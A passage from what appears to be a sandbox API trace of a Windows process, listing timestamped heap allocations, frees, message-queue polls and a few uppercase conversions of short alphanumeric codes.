wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0243.015] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0243.015] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.016] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0243.016] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0243.016] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.017] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.017] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0243.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.017] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.017] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0243.018] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0243.018] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.018] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0243.018] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.019] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0243.019] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0243.019] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0243.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0243.019] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0243.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.020] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.020] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0243.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0243.020] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0243.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0243.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.022] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0243.022] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0243.022] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0243.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0243.022] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.023] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0243.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0243.023] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.024] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0243.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0243.024] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0243.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0243.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0243.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0243.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0243.025] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0243.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0243.026] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0243.026] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0243.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0243.026] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0243.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0243.027] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0243.027] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0243.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 